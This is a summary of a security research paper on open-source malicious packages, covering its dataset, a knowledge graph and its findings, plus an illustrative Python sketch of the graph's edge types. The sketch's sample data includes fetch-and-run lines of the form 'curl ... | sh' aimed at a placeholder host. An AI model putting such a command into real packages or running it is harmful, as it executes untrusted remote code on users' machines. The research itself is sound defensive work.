OSS Malicious Package Analysis in the Wild

Xiaoyan Zhou, Ying Zhang, Wenjia Niu, Jiqiang Liu, Haining Wang, Qiang Li
2024-04-21
Abstract: The open-source software (OSS) ecosystem suffers from various security threats and risks, and malicious packages play a central role in software supply chain (SSC) attacks. Although malware research has a history of over thirty years, less attention has been paid to OSS malware. Its existing research has three limitations: a lack of high-quality datasets, malware diversity, and attack campaign context. In this paper, we first build and curate the largest dataset of 23,425 malicious packages from scattered online sources. We then propose a knowledge graph to represent the OSS malware corpus and conduct malicious package analysis in the wild. Our main findings include (1) it is essential to collect malicious packages from various online sources because there is little data overlap between different sources; (2) despite the sheer volume of SSC attack campaigns, many malicious packages are similar, and unknown/sophisticated attack behaviors have yet to emerge or be detected; (3) OSS malicious package has its distinct life cycle, denoted as {changing->release->detection->removal}, and slightly changing the package (different name) is a widespread attack manner; (4) while malicious packages often lack context about how and who released them, security reports disclose the information about corresponding SSC attack campaigns.
Cryptography and Security, Software Engineering
What problem does this paper attempt to address?
This paper addresses the security threats and risks in the open-source software (OSS) ecosystem, focusing on the role of malicious packages in software supply chain (SSC) attacks. Although malware research has a history of more than 30 years, OSS malware has received less attention, and existing research has three main limitations:

1. **Lack of high-quality datasets**: Existing malware datasets are small in scale and drawn from a single source.
2. **Insufficient diversity of malware**: Although there are many malicious packages, their code is highly similar, so the samples lack diversity.
3. **Lack of context on attack campaigns**: Little is known about the attack campaigns behind the malicious packages.

To address these limitations, the authors carried out the following work:

- **Construct a large-scale, high-quality dataset**: They collected and curated 23,425 malicious packages from different online sources, covering 10 OSS ecosystems.
- **Propose a knowledge graph representation**: They use a knowledge graph to represent OSS malicious packages and describe the relationships between packages through four types of edges (duplication, dependency, similarity, co-existence).
- **Conduct an empirical study**: By analyzing the malicious packages, they answer research questions about dataset redundancy and quality, malicious package diversity, attack campaign characteristics, and the evolution of malicious packages over time.

### Main findings

1. **The importance of diversifying data sources**: Malicious packages must be collected from multiple online sources because there is little data overlap between different sources.
2. **Slow development of malicious package diversity**: Although the number of malicious packages is increasing, their diversity and complexity have changed little, which suggests that current defense tools remain effective.
3. **The life cycle of malicious packages**: Malicious packages have their own distinct life cycle, {modification → release → detection → removal}. Attackers often retry an attack after making minor changes to a package, such as changing its name.
4. **Security reports provide context on attack campaigns**: Although malicious packages themselves lack information about how and by whom they were released, security reports disclose the corresponding attack campaigns.

Through this study, the authors aim to improve the understanding of OSS malicious packages and to support efforts to secure the OSS ecosystem.
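
The four edge types named in the summary (duplication, dependency, similarity, co-existence) can be illustrated with a minimal Python sketch. This is not the authors' implementation. The `Package` fields, the `build_edges` helper, the edge definitions (identical hash for duplication, a `difflib` ratio above a threshold for similarity, a shared security report for co-existence), the 0.8 threshold, and all package names are assumptions made for illustration.

```python
from dataclasses import dataclass
from difflib import SequenceMatcher
from hashlib import sha256
from itertools import combinations


@dataclass(frozen=True)
class Package:
    """Hypothetical node in the graph: one malicious package."""
    name: str
    ecosystem: str
    code: str
    dependencies: frozenset = frozenset()  # names of packages it depends on
    reports: frozenset = frozenset()       # IDs of security reports that mention it

    @property
    def digest(self) -> str:
        # Content hash used to spot byte-identical packages.
        return sha256(self.code.encode()).hexdigest()


def build_edges(packages, similarity_threshold=0.8):
    """Return a set of (source, target, edge_type) triples.

    Edge definitions here are assumptions, not the paper's exact rules.
    """
    edges = set()
    for a, b in combinations(packages, 2):
        if a.digest == b.digest:
            # Identical code under different names.
            edges.add((a.name, b.name, "duplication"))
        elif SequenceMatcher(None, a.code, b.code).ratio() >= similarity_threshold:
            # Near-identical code, e.g. a changed URL.
            edges.add((a.name, b.name, "similarity"))
        if a.reports & b.reports:
            # Both packages appear in the same security report.
            edges.add((a.name, b.name, "co-existence"))
        # Dependency edges are directed: dependent -> dependency.
        if b.name in a.dependencies:
            edges.add((a.name, b.name, "dependency"))
        if a.name in b.dependencies:
            edges.add((b.name, a.name, "dependency"))
    return edges


# Made-up sample data; none of these names refer to real packages.
payload_a = "import os\nos.system('curl http://example.invalid/a | sh')\n"
payload_b = "import os\nos.system('curl http://example.invalid/b | sh')\n"

packages = [
    Package("acme-utils", "PyPI", payload_a, reports=frozenset({"report-1"})),
    Package("acme-utilz", "PyPI", payload_a, reports=frozenset({"report-1"})),
    Package("acme-tools", "PyPI", payload_b),
    Package("acme-loader", "PyPI", "print('hello')",
            dependencies=frozenset({"acme-utils"})),
]

edges = build_edges(packages)
for edge in sorted(edges):
    print(edge)
```

In this toy data, the renamed copy `acme-utilz` is linked to `acme-utils` by a duplication edge, which mirrors the "slightly changed package" pattern described in the life cycle finding. A real pipeline would likely need a more robust similarity measure than a character-level ratio.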